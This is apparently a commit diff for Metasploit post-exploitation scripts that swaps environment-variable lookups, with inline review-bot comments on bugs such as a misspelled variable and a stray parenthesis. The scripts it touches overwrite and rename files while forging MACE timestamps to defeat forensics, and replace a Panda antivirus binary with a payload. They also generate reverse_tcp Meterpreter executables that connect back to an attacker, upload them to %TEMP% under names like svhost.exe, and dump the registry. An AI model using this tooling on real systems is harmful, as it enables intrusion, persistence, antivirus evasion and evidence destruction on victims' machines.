prog=expand_path("%ProgramFiles%") << "\\winpcap\\rpcapd.exe"
# TODO: check if this works on x64
prog=session.sys.config.getenv('ProgramFiles') << "\\winpcap\\rpcapd.exe"
if reg != 2
print_status("Setting rpcapd as 'auto' service")
service_change_startup("rpcapd","auto")


@ -106,7 +106,7 @@ class Metasploit3 < Msf::Post
end
# set profile paths
sysdrive = session.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = session.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
profiles_path = sysdrive + "\\Documents and Settings\\"
profiles_path = sysdrive + "\\Users\\" if os =~ /(Windows 7|2008|Vista)/


@ -57,8 +57,8 @@ class Metasploit3 < Msf::Post
#Function to calculate the size of the cluster
def size_cluster()
drive = expand_path("%SystemDrive%")
r = client.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
drive = session.sys.config.getenv('SystemDrive')
r = session.railgun.kernel32.GetDiskFreeSpaceA(drive,4,4,4,4)
cluster = r["lpBytesPerSector"] * r["lpSectorsPerCluster"]
print_status("Cluster Size: #{cluster}")
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Post
#Function to calculate the real file size on disk (file size + slack space)
def size_on_disk(file)
size_file = client.fs.file.stat(file).size;
size_file = session.fs.file.stat(file).size;
print_status("Size of the file: #{size_file}")
if (size_file<800)
@ -94,13 +94,13 @@ class Metasploit3 < Msf::Post
rsec= Rex::Text.rand_text_numeric(7,bad='012')
date = Time.now - rsec.to_i
print_status("Changing MACE attributes")
client.priv.fs.set_file_mace(file, date,date,date,date)
session.priv.fs.set_file_mace(file, date,date,date,date)
end
#Function to overwrite the file
def file_overwrite(file,type,n)
#FILE_FLAG_WRITE_THROUGH: Write operations will go directly to disk
r = client.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
r = session.railgun.kernel32.CreateFileA(file, "GENERIC_WRITE", "FILE_SHARE_READ|FILE_SHARE_WRITE", nil, "OPEN_EXISTING", "FILE_FLAG_WRITE_THROUGH", 0)
handle=r['return']
real_size=size_on_disk(file)
@ -118,10 +118,10 @@ class Metasploit3 < Msf::Post
end
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365541(v=vs.85).aspx
client.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
session.railgun.kernel32.SetFilePointer(handle,0,nil,"FILE_BEGIN")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365747(v=vs.85).aspx
w=client.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
w=session.railgun.kernel32.WriteFile(handle,random,real_size,4,nil)
if w['return']==false
print_error("The was an error writing to disk, check permissions")
@ -131,7 +131,7 @@ class Metasploit3 < Msf::Post
print_status("#{w['lpNumberOfBytesWritten']} bytes overwritten")
end
client.railgun.kernel32.CloseHandle(handle)
session.railgun.kernel32.CloseHandle(handle)
change_mace(file)
#Generate a long random file name before delete it
@ -139,7 +139,7 @@ class Metasploit3 < Msf::Post
print_status("Changing file name")
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa365239(v=vs.85).aspx
client.railgun.kernel32.MoveFileA(file,newname)
session.railgun.kernel32.MoveFileA(file,newname)
file_rm(newname)
print_good("File erased!")
@ -148,7 +148,7 @@ class Metasploit3 < Msf::Post
#Check if the file is encrypted or compressed
def comp_encr(file)
#http://msdn.microsoft.com/en-us/library/windows/desktop/aa364944(v=vs.85).aspx
handle=client.railgun.kernel32.GetFileAttributesA(file)
handle=session.railgun.kernel32.GetFileAttributesA(file)
type= handle['return']
#FILE_ATTRIBUTE_COMPRESSED=0x800


@ -61,7 +61,7 @@ def enum_users(os)
user = @client.sys.config.getuid
userpath = nil
useroffcpath = nil
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
@ -83,7 +83,7 @@ def enum_users(os)
users << userinfo
end
else
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userpath'] = userpath + uservar + lnkpath
userinfo['useroffcpath'] = userpath + uservar + officelnkpath
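Review bot: `getenv` can return nil, and both `sysdrv + "\\Users\\"` in the first hunk and `userpath + uservar + lnkpath` in the second will then raise instead of failing with a readable message. The new `getenv` is `getenvs(var_name)[var_name]`, and `getenvs` is documented as leaving out names the target did not return; what `expand_path` returned for an unset variable is not visible here, so this may be a behaviour change. A guard right after the lookup, e.g. `raise "SystemDrive is not set on the target" if sysdrv.nil?`, keeps the failure explicit. The same unguarded concatenation recurs in the other `enum_users`, `wmicexec`, `upload` and `TEMP` hunks of this commit. `enum_users` starts and ends outside both hunks.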


@ -89,7 +89,7 @@ if client.platform =~ /win32|win64/
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")


@ -195,7 +195,7 @@ host = session.session_host
@log_dir = File.join(Msf::Config.log_directory, "scripts", "enum_chrome", Rex::FileUtils.clean_path(@host_info['Computer']), Time.now.strftime("%Y%m%d.%H%M"))
::FileUtils.mkdir_p(@log_dir)
sysdrive = client.fs.file.expand_path("%SYSTEMDRIVE%")
sysdrive = client.sys.config.getenv('SYSTEMDRIVE')
os = @host_info['OS']
if os =~ /(Windows 7|2008|Vista)/
@profiles_path = sysdrive + "\\Users\\"
@ -218,7 +218,7 @@ if is_system?
print_status "users found: #{usernames.join(", ")}"
else
print_status "running as user '#{uid}'..."
usernames << client.fs.file.expand_path("%USERNAME%")
usernames << client.sys.config.getenv('USERNAME')
prepare_railgun
end


@ -251,8 +251,9 @@ if client.platform =~ /win32|win64/
if frfxchk
user = @client.sys.config.getuid
if not is_system?
usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
envs = @client.sys.config.getenvs('USERNAME', 'APPDATA')
usrname = envs['USERNAME']
db_path = envs['APPDATA'] + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end
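Review bot: The new `usrname = envs['USERNAME']` drops the `Rex::FileUtils.clean_path(...)` call that wrapped the old value, so the user name reported by the remote host is no longer sanitised. If `usrname` is later used to build a local log or download path (not visible in this hunk), a value containing path separators would now pass through unchanged onto the operator's filesystem. Keeping the wrapper preserves the previous behaviour: `usrname = Rex::FileUtils.clean_path(envs['USERNAME'])`. The enclosing block continues outside the hunk.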


@ -22,7 +22,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\Users\\"
@ -43,7 +43,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo
@ -83,7 +83,7 @@ def enum_powershell
end
if powershell_version =~ /2./
print_status("Powershell Modules:")
powershell_module_path = @client.fs.file.expand_path("%PSModulePath%")
powershell_module_path = @client.sys.config.getenv('PSModulePath')
@client.fs.dir.foreach(powershell_module_path) do |m|
next if m =~ /^(\.|\.\.)$/
print_status("\t#{m}")
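Review bot: `PSModulePath` is normally a semicolon-separated list of directories, yet in the third hunk its raw value is handed to `@client.fs.dir.foreach` as if it were a single path. The old `expand_path` line had the same problem, but now that the value comes straight from `getenv` it is a good moment to split it: `powershell_module_path.to_s.split(';').each do |dir|` around the existing `foreach(dir)` loop. The `to_s` also covers the case where the variable is not set and `getenv` returns nil. `enum_powershell` continues outside the hunk.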


@ -223,7 +223,7 @@ def enum_users
users = []
user = @client.sys.config.getuid
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -244,7 +244,7 @@ def enum_users
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + profilepath
users << userinfo


@ -18,13 +18,12 @@ def list_env_vars(var_names)
"Name",
"Value"
])
var_names.flatten.each do |v|
tbl << [v,@client.fs.file.expand_path("\%#{v}\%")]
@client.sys.config.getenvs(*var_names.flatten).each do |k, v|
tbl << [k, v]
end
print("\n" + tbl.to_s + "\n")
end
opts.parse(args) { |opt, idx, val|
case opt
when "-h"
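Review bot: `list_env_vars` now emits rows only for the variables `getenvs` returned, so a requested name that is unset on the target silently disappears from the table, whereas the old loop printed one row per requested name. Iterating over the request keeps the gap visible: `vars = @client.sys.config.getenvs(*var_names.flatten)` followed by `var_names.flatten.each { |v| tbl << [v, vars[v] || "(not set)"] }`. The start of the method is outside the hunk.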


@ -114,7 +114,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -135,7 +135,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo


@ -145,7 +145,7 @@ def enum_users(os)
users = []
path4users = ""
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
sysdrv = @client.sys.config.getenv('SystemDrive')
if os =~ /Windows 7|Vista|2008/
path4users = sysdrv + "\\users\\"
@ -166,7 +166,7 @@ def enum_users(os)
end
else
userinfo = {}
uservar = @client.fs.file.expand_path("%USERNAME%")
uservar = @client.sys.config.getenv('USERNAME')
userinfo['username'] = uservar
userinfo['userappdata'] = path4users + uservar + path2purple
users << userinfo


@ -301,7 +301,7 @@ def checkdep(session)
tmpout = ""
depmode = ""
# Expand environment %TEMP% variable
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Create random name for the wmic output
wmicfile = sprintf("%.5d",rand(100000))
wmicout = "#{tmp}\\#{wmicfile}"


@ -30,7 +30,7 @@ end
record = ""
#Set path to the hosts file
hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\hosts"
hosts = session.sys.config.getenv('SYSTEMROOT')+"\\System32\\drivers\\etc\\hosts"
#Function check if UAC is enabled
def checkuac(session)
winver = session.sys.config.sysinfo


@ -69,16 +69,15 @@ elsif client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Change to our working directory.
workingdir = client.fs.file.expand_path("%ProgramFiles%")
client.fs.dir.chdir(workingdir + "\\Panda Software\\Panda Antivirus 2007\\")
workingdir = client.sys.config.getenv('ProgramFiles') + "\\Panda Software\\Panda Antivirus 2007\\"
client.fs.dir.chdir(workindir)
# Create a backup of the original exe.
print_status("Creating a copy of PAVSRV51 (PAVSRV51_back.EXE)...")
client.sys.process.execute("cmd.exe /c rename PAVSRV51.EXE PAVSRV51_back.EXE", nil, {'Hidden' => 'true'})
# Place our newly created exe with the orginal binary name.
tempdir = client.fs.file.expand_path("%ProgramFiles%")
tempexe = tempdir + "\\Panda Software\\Panda Antivirus 2007\\" + "PAVSRV51.EXE"
tempexe = workingdir + "PAVSRV51.EXE"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")
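Review bot: `client.fs.dir.chdir(workindir)` misspells the variable assigned on the line above, so the script raises NameError at that call; it should read `client.fs.dir.chdir(workingdir)`. The assignment itself concatenates onto `getenv('ProgramFiles')` without a nil check, so an unset variable would fail one line earlier with a less obvious error. The surrounding `elsif` branch starts and ends outside the hunk.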


@ -106,7 +106,7 @@ def write_script_to_target(target_dir,vbs)
if target_dir
tempdir = target_dir
else
tempdir = @client.fs.file.expand_path("%TEMP%")
tempdir = @client.sys.config.getenv('TEMP')
end
tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs"
fd = @client.fs.file.new(tempvbs, "wb")


@ -70,7 +70,7 @@ if client.platform =~ /win32|win64/
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")


@ -19,7 +19,7 @@ require 'digest/sha1'
"-l" => [ false, "Download Prefetch Folder Analysis Log"]
)
@tempdir = @session.fs.file.expand_path("%TEMP%")
@tempdir = @session.sys.config.getenv('TEMP')
#---------------------------------------------------------------------------------------------------------
def read_program_list


@ -57,7 +57,7 @@ def wmicexec(session,wmic,user,pass,trgt)
runfail = 0
runningas = session.sys.config.getuid
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
# Temporary file on windows host to store results
wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt"


@ -179,7 +179,7 @@ end
#---------------------------------------------------------------------------------------------------------
def upload(session,file)
location = session.fs.file.expand_path("%TEMP%")
location = session.sys.config.getenv('TEMP')
fileontrgt = "#{location}\\svhost#{rand(100)}.exe"
print_status("Uploading #{file}....")
session.fs.file.upload_file("#{fileontrgt}","#{file}")


@ -99,6 +99,10 @@ upload_fn = nil
end
}
envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
sysdir = envs['SystemRoot']
tmpdir = envs['TEMP']
# Must have at least one of -c or -u
if not cmd and not upload_fn
print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@ -110,9 +114,8 @@ if not cmd and not upload_fn
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
#and placing it on the target in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
cmd = tempdir + "\\" + tempexename + ".exe"
cmd = tmpdir + "\\" + tempexename + ".exe"
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
fd = client.fs.file.new(cmd, "wb")
fd.write(exe)
@ -139,8 +142,6 @@ end
#
# Upload the payload command if needed
#
sysdir = session.fs.file.expand_path("%SystemRoot%")
tmpdir = session.fs.file.expand_path("%TEMP%")
if upload_fn
begin
location = tmpdir.dup


@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
unsupported if client.platform !~ /win32|win64/i
begin
tmp = client.fs.file.expand_path("%TEMP%")
tmp = client.sys.config.getenv('TEMP')
print_status("Gathering basic system information...")


@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val|
end
end
envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
tempdir = envs['TEMP']
sysdir = envs['SYSTEMROOT']
# Get the exe payload.
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
pay.datastore['LHOST'] = rhost
@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport
raw = pay.generate
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
#and placing it on the target in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
tempexe = tempdir + "\\" + tempexename + ".exe"
tempexe = "#{tempdir}\\#{tempexename}.exe"
print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
fd = client.fs.file.new(tempexe, "wb")
fd.write(exe)
@ -129,7 +132,7 @@ service_list.each do |serv|
moved = false
configed = false
#default path, but there should be an ImagePath registry key
source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
source = "#{sysdir}\\system32\\#{serv}.exe")
#get path to exe; parse out quotes and arguments
sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
sourcemaybe = client.fs.file.expand_path(sourceorig)
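Review bot: The new line `source = "#{sysdir}\\system32\\#{serv}.exe")` in the third hunk keeps the closing parenthesis of the removed `expand_path(` call, which is a syntax error that prevents the whole script from loading. It should be `source = "#{sysdir}\\system32\\#{serv}.exe"`. Running `ruby -c` over the touched scripts before merging would catch this kind of leftover from a mechanical replacement. The `service_list.each` body continues outside the hunk.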


@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
# Place our newly created exe in %TEMP%
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Sending EXE payload '#{tempexe}'.")
fd = client.fs.file.new(tempexe, "wb")


@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
raise "File to Upload does not exists!"
else
if trgloc == ""
location = session.fs.file.expand_path("%TEMP%")
location = session.sys.config.getenv('TEMP')
else
location = trgloc
end


@ -32,7 +32,7 @@ def upload(session,file,trgloc)
if not ::File.exists?(file)
raise "File to Upload does not exists!"
else
@location = session.fs.file.expand_path("%TEMP%")
@location = session.sys.config.getenv('TEMP')
begin
ext = file.scan(/\S*(.exe)/i)
if ext.join == ".exe"


@ -152,7 +152,7 @@ else
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%")
tempdir = client.sys.config.getenv('TEMP')
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
tempexe.gsub!("\\\\", "\\")


@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
raise "File to Upload does not exists!"
else
if trgloc == nil
location = client.fs.file.expand_path("%TEMP%")
location = client.sys.config.getenv('TEMP')
else
location = trgloc
end


@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
@client.response_timeout=120
begin
tmp = @client.fs.file.expand_path("%TEMP%")
tmp = @client.sys.config.getenv('TEMP')
wmiccmds.each do |wmi|
if i < 10
@ -409,7 +409,7 @@ end
def chmace(cmds)
windir = ''
print_status("Changing Access Time, Modified Time and Created Time of Files Used")
windir = @client.fs.file.expand_path("%WinDir%")
windir = @client.sys.config.getenv('WinDir')
cmds.each do |c|
begin
@client.core.use("priv")
@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
#This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
garbage = ''
hives = %w{HKCU HKLM HKCC HKCR HKU}
windir = @client.fs.file.expand_path("%WinDir%")
windir = @client.sys.config.getenv('WinDir')
print_status('Dumping and Downloading the Registry')
hives.each do |hive|
begin


@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
tmpout = ''
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
tmp = session.sys.config.getenv('TEMP')
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"